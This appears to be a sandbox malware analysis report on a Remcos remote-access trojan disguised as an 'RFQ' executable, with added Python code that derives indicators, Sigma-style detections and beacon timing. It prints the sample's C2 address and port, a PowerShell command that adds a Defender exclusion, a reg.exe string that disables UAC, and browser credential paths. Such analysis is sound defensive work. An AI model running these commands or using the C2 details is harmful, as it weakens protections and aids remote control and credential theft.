Windows Analysis Report
RFQ-20241230.pif.exe

Overview

General Information

Sample name: RFQ-20241230.pif.exe
Analysis ID: 1586923
MD5: a2800b58845d5f108333e9f7f9c388dd
SHA1: 1a1ce9b83de9d2e967a539aabeafdab36dbb626a
SHA256: b43ca133d57448c7afb42bffcb1ce756cdad70308d3f49c9c981fac24c55e76f
Tags: exe, user-lowmal3

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • RFQ-20241230.pif.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\RFQ-20241230.pif.exe" MD5: A2800B58845D5F108333E9F7F9C388DD)
    • powershell.exe (PID: 7904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RFQ-20241230.pif.exe (PID: 7924 cmdline: "C:\Users\user\Desktop\RFQ-20241230.pif.exe" MD5: A2800B58845D5F108333E9F7F9C388DD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (extracted by the sandbox):
{"Host:Port:Password": ["173.211.106.233:2404:1"], "Assigned name": "RemcoHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4WOIVV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
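The configuration is printed as one flat JSON object. As an added example (not the sandbox's extractor code), the Python below parses it into hunting artifacts: each "Host:Port:Password" entry split into host, port and password, the HKCU\SOFTWARE\<Mutex> key that this report later shows the sample writing (the Rmc-4WOIVV\exepath registry event), the Run keys the config enables, and any C2 port outside 80/443. Treating the mutex-named key as a general Remcos artifact is an assumption drawn from this single run.

```python
"""Turn the Remcos configuration printed in this report into hunting artifacts.
Added example; the field names are the ones the sandbox's extractor prints."""
import ipaddress
import json

# The configuration block exactly as printed in the report (copied, not reconstructed).
CONFIG_JSON = r'''{"Host:Port:Password": ["173.211.106.233:2404:1"], "Assigned name": "RemcoHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4WOIVV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}'''


def load_config(text: str) -> dict:
    return json.loads(text)


def parse_c2(entry: str) -> dict:
    """Split one "host:port:password" entry. Split from the right: an IPv6
    literal contains colons, so a plain split(":") would break the host."""
    host, port, password = entry.rsplit(":", 2)
    try:
        ipaddress.ip_address(host)
        is_ip = True
    except ValueError:
        is_ip = False          # a hostname: resolve it before blocking
    return {"host": host, "port": int(port), "password": password, "is_ip": is_ip}


def config_to_iocs(cfg: dict) -> dict:
    """Derive what to hunt for on hosts and on the wire from the config."""
    def enabled(key: str) -> bool:
        return cfg.get(key) == "Enable"

    c2 = [parse_c2(e) for e in cfg["Host:Port:Password"]]
    iocs = {
        "c2": c2,
        "mutex": cfg["Mutex"],
        # This report shows the sample writing HKCU\SOFTWARE\<Mutex>\exepath;
        # generalising that to other builds is an assumption.
        "registry_keys": ["HKCU\\SOFTWARE\\" + cfg["Mutex"]],
        "persistence": [],
        # Ports other than 80/443 stand out in egress logs (2404 here).
        "nonstandard_ports": sorted({c["port"] for c in c2 if c["port"] not in (80, 443)}),
    }
    if enabled("Setup HKCU\\Run"):
        iocs["persistence"].append(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run")
    if enabled("Setup HKLM\\Run"):
        iocs["persistence"].append(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run")
    return iocs


if __name__ == "__main__":
    print(json.dumps(config_to_iocs(load_config(CONFIG_JSON)), indent=2))
```

The Run-key entries are only what the configuration enables; whether the keys were actually written in this run is not something the configuration alone can tell you, and the report's own registry evidence is limited to the Rmc-4WOIVV\exepath value.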
Yara matches in process memory dumps (Source / Rule / Description / Author / Strings):

Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp
  Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
  Strings:
  • 0x30f00:$a1: Remcos restarted by watchdog!
  • 0x31478:$a3: %02i:%02i:%02i:%03i
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
(18 entries in total; the remaining entries are not reproduced here.)

Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):

Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack
  Rule: JoeSecurity_Keylogger_Generic; Description: Yara detected Keylogger Generic; Author: Joe Security
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack
  Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack
  Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
  Strings:
  • 0x69ef8:$a1: Remcos restarted by watchdog!
  • 0x6a470:$a3: %02i:%02i:%02i:%03i
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack
  Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
  Strings:
  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64204:$str_b2: Executing file:
  • 0x6503c:$str_b3: GetDirectListeningPort
  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x64b80:$str_b7: \update.vbs
  • 0x6422c:$str_b9: Downloaded file:
  • 0x64218:$str_b10: Downloading file:
  • 0x642bc:$str_b12: Failed to upload file:
  • 0x65004:$str_b13: StartForward
  • 0x65024:$str_b14: StopForward
  • 0x64ad8:$str_b15: fso.DeleteFile "
  • 0x64a6c:$str_b16: On Error Resume Next
  • 0x64b08:$str_b17: fso.DeleteFolder "
  • 0x642ac:$str_b18: Uploaded file:
  • 0x6426c:$str_b19: Unable to delete:
  • 0x64aa0:$str_b20: while fso.FileExists("
  • 0x64749:$str_c0: [Firefox StoredLogins not found]
(34 entries in total; the remaining entries are not reproduced here.)

                System Summary

Three Sigma rules fired on the same process-creation event: two by Florian Roth (Nextron Systems) and one by Roberto Rodriguez @Cyb3rWard0g (rule) / oscd.community (improvements). These are the three "Sigma detected" entries in the signature list above. The event data, identical for all three hits:

Source: Process started
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
  ParentImage: C:\Users\user\Desktop\RFQ-20241230.pif.exe
  ParentProcessId: 7696
  ParentProcessName: RFQ-20241230.pif.exe
  ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
  ProcessId: 7904
  ProcessName: powershell.exe

Note the command line names System32 while Image resolves to SysWOW64: the sample is a 32-bit PE, so WOW64 file-system redirection maps its System32 reference to the 32-bit PowerShell. Detections keyed on the Image path alone must account for both locations.
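The process-creation event above is exactly what the two PowerShell Sigma rules key on. The Python below is an added example, not Joe Sandbox's or the Sigma project's code: it re-implements that matching over constructed events, including Sigma's base64offset technique for catching the cmdlet name when it is hidden inside an -EncodedCommand blob, and adds a rule for the reg.exe EnableLUA command carried by the REMCOS_RAT_variants Yara match. Only the PID 7904 event is taken from the report; the others are made up here, and the "/d 0 /f" tail of the reg.exe command is assumed because the Yara string in the report is truncated.

```python
"""Process-creation detections for the two behaviours this report records:
a Defender exclusion added through Add-MpPreference (plain text or inside
-EncodedCommand) and reg.exe tampering with EnableLUA. Added example; the
events are constructed to mirror the report, not real telemetry."""
import base64
import re


def encode_powershell_command(script: str) -> str:
    """What powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def base64offset_variants(needle: bytes) -> list[str]:
    """The three base64 alignments of `needle`, with the edge characters that
    depend on neighbouring bytes stripped (what Sigma's base64offset does)."""
    start = (0, 2, 3)        # leading chars contaminated by the i padding bytes
    end = (None, -3, -2)     # trailing chars contaminated by whatever follows
    variants = []
    for i in range(3):
        padded = b" " * i + needle
        b64 = base64.b64encode(padded).decode("ascii")
        variants.append(b64[start[i]:end[len(padded) % 3]])
    return variants


# Plain-text use of the MpPreference cmdlets to add an exclusion.
RE_EXCLUSION = re.compile(
    r"(Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)", re.I)
# Any alignment of the cmdlet names as they appear inside an -EncodedCommand blob.
B64_CMDLET_VARIANTS = [
    v for name in ("Add-MpPreference", "Set-MpPreference")
    for v in base64offset_variants(name.encode("utf-16-le"))
]
# reg.exe writing EnableLUA under the system policy key.
RE_ENABLELUA = re.compile(
    r"reg(\.exe)?\s+add\s+.*\\Policies\\System\b.*\bEnableLUA\b", re.I)

RULES = [
    ("defender_exclusion_plain", lambda cmd: bool(RE_EXCLUSION.search(cmd))),
    ("mppreference_encoded", lambda cmd: any(v in cmd for v in B64_CMDLET_VARIANTS)),
    ("uac_enablelua_tamper", lambda cmd: bool(RE_ENABLELUA.search(cmd))),
]


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (ProcessId, rule name) for every rule each event trips."""
    return [(ev["ProcessId"], name) for ev in events
            for name, test in RULES if test(ev.get("CommandLine", ""))]


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\user\Desktop\RFQ-20241230.pif.exe"
EVENTS = [
    {   # the event from the report's Sigma hit
        "ProcessId": 7904, "Image": PS, "ParentImage": SAMPLE,
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                       r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"',
    },
    {   # constructed: the same cmdlet hidden in -EncodedCommand
        "ProcessId": 8001, "Image": PS, "ParentImage": SAMPLE,
        "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + encode_powershell_command(
            r"Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ-20241230.pif.exe'"),
    },
    {   # constructed from the truncated Yara string; "/d 0 /f" is assumed, not from the report
        "ProcessId": 8002, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": SAMPLE,
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe ADD '
                       r'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    },
    {   # constructed benign control: reading, not changing, Defender settings
        "ProcessId": 8003, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-MpPreference",
    },
]

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The encoded-command rule only proves that an MpPreference cmdlet was hidden in base64, not which parameters it carried; decode the blob (UTF-16LE) before deciding on severity. Enriching with ParentImage, as the report's event does, is what separates this hit from an administrator running the same cmdlet from a console.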

                Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security
  Details: F5 A9 16 B7 D7 DD 52 3C 72 D4 F6 4A D6 84 87 63 46 28 6C 57 0E EA 64 9D 8B 31 95 CA 53 83 B9 35 E3 B8 0C 1A CB 9A AF 37 9F 91 33 7F 30 6C 92 63 1C B2 B7 E4 22 49 0A 18 12 BF 8C 55 14 60 A7 9C A6 6C ED 04 E5 D2 66 CE 9E 5C 81 8E 79 73 27 57 00 8C C2 26 BF BB
  EventID: 13; EventType: SetValue
  Image: C:\Users\user\Desktop\RFQ-20241230.pif.exe; ProcessId: 7924
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4WOIVV\exepath

EventID 13 is the Sysmon "RegistryEvent (Value Set)" event. The key is named after the mutex from the extracted configuration (Rmc-4WOIVV), and the write comes from the second instance of the sample (PID 7924), the one that receives the injected payload. The value data is not a plaintext path, which is consistent with Remcos storing this value encrypted; the key name itself is the host-based indicator worth sweeping for.
Suricata alerts:

Timestamp                        SID      Severity  Classtype                                      Source IP    Src Port  Destination IP   Dst Port  Protocol
2025-01-09T19:03:28.977389+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49734     173.211.106.233  2404      TCP
2025-01-09T19:03:51.431052+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49865     173.211.106.233  2404      TCP
2025-01-09T19:04:13.902031+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49978     173.211.106.233  2404      TCP
2025-01-09T19:04:36.295670+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49981     173.211.106.233  2404      TCP
2025-01-09T19:04:58.703809+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49982     173.211.106.233  2404      TCP
2025-01-09T19:05:21.120704+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49983     173.211.106.233  2404      TCP
2025-01-09T19:05:43.528036+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49984     173.211.106.233  2404      TCP
2025-01-09T19:06:05.950386+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49985     173.211.106.233  2404      TCP
2025-01-09T19:06:28.391569+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49986     173.211.106.233  2404      TCP
2025-01-09T19:06:50.872655+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49987     173.211.106.233  2404      TCP
2025-01-09T19:07:13.376765+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49988     173.211.106.233  2404      TCP
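The alert table shows the same host reconnecting to 173.211.106.233:2404 at an almost constant interval, each time from a fresh ephemeral port, which is the shape of a timer-driven beacon rather than user-driven traffic. The Python below is an added example, not part of the report or of Suricata: it transcribes the rows above (the constant classtype column dropped) and measures the cadence per flow. The thresholds (at least 5 events, coefficient of variation at most 0.1) are my own choices, not values from the report.

```python
"""Beacon-cadence check over the Suricata alert table in this report (added example).
The rows are transcribed from the table; classtype is omitted because it is the
same for every row."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# timestamp sid severity src sport dst dport proto
ALERTS = """\
2025-01-09T19:03:28.977389+0100 2036594 1 192.168.2.9 49734 173.211.106.233 2404 TCP
2025-01-09T19:03:51.431052+0100 2036594 1 192.168.2.9 49865 173.211.106.233 2404 TCP
2025-01-09T19:04:13.902031+0100 2036594 1 192.168.2.9 49978 173.211.106.233 2404 TCP
2025-01-09T19:04:36.295670+0100 2036594 1 192.168.2.9 49981 173.211.106.233 2404 TCP
2025-01-09T19:04:58.703809+0100 2036594 1 192.168.2.9 49982 173.211.106.233 2404 TCP
2025-01-09T19:05:21.120704+0100 2036594 1 192.168.2.9 49983 173.211.106.233 2404 TCP
2025-01-09T19:05:43.528036+0100 2036594 1 192.168.2.9 49984 173.211.106.233 2404 TCP
2025-01-09T19:06:05.950386+0100 2036594 1 192.168.2.9 49985 173.211.106.233 2404 TCP
2025-01-09T19:06:28.391569+0100 2036594 1 192.168.2.9 49986 173.211.106.233 2404 TCP
2025-01-09T19:06:50.872655+0100 2036594 1 192.168.2.9 49987 173.211.106.233 2404 TCP
2025-01-09T19:07:13.376765+0100 2036594 1 192.168.2.9 49988 173.211.106.233 2404 TCP
"""


def parse_alerts(text: str) -> list[dict]:
    """Parse the whitespace-separated rows; %z accepts the +0100 offset form."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, src, sport, dst, dport, proto = line.split()
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "severity": int(sev),
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto,
        })
    return rows


def beacon_profile(rows: list[dict], min_events: int = 5, max_cv: float = 0.1) -> dict:
    """Group alerts per (src, dst, dport, sid) and measure how regular the gaps are.
    cv = stdev / mean of the inter-arrival gaps; a low cv over enough events is
    what a sleep-loop beacon looks like. Distinct source ports show how many
    separate TCP connections (here: TLS handshakes) were made."""
    groups = defaultdict(list)
    for r in rows:
        groups[(r["src"], r["dst"], r["dport"], r["sid"])].append((r["ts"], r["sport"]))
    profile = {}
    for key, hits in groups.items():
        hits.sort()
        stamps = [t for t, _ in hits]
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        entry = {"events": len(hits),
                 "distinct_source_ports": len({p for _, p in hits}),
                 "periodic": False}
        if len(hits) >= min_events:
            m, sd = mean(gaps), pstdev(gaps)
            cv = sd / m if m else float("inf")
            entry.update(mean_gap_s=round(m, 3), stdev_s=round(sd, 3), cv=round(cv, 4))
            entry["periodic"] = cv <= max_cv
        profile[key] = entry
    return profile


if __name__ == "__main__":
    for key, entry in beacon_profile(parse_alerts(ALERTS)).items():
        print(key, entry)
```

Against the report's rows this yields eleven connections about 22.4 seconds apart with a standard deviation of a few tens of milliseconds, so the flow is flagged as periodic. The same grouping works over firewall or NetFlow records when no IDS signature fires; the JA3 hash is what makes this particular alert high-confidence, the cadence is what you would fall back on without it.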


                AV Detection

Source: RFQ-20241230.pif.exe; Avira: detected
Source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["173.211.106.233:2404:1"], "Assigned name": "RemcoHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4WOIVV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: RFQ-20241230.pif.exe; ReversingLabs: Detection: 73%
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ-20241230.pif.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: RFQ-20241230.pif.exe, 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_af7cf6e1-0)

                Exploits

Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR

                Privilege Escalation

Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00406764 _wcslen,CoGetObject
  (CoGetObject resolves a moniker string to a COM object and is the call used by the CMSTPLUA elevation-moniker technique that the "Contains functionality to bypass UAC (CMSTPLUA)" signature refers to; the moniker string itself is not shown in this report.)
Source: RFQ-20241230.pif.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RFQ-20241230.pif.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_0044D5F9 FindFirstFileExA
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00406AC2 FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

                Networking

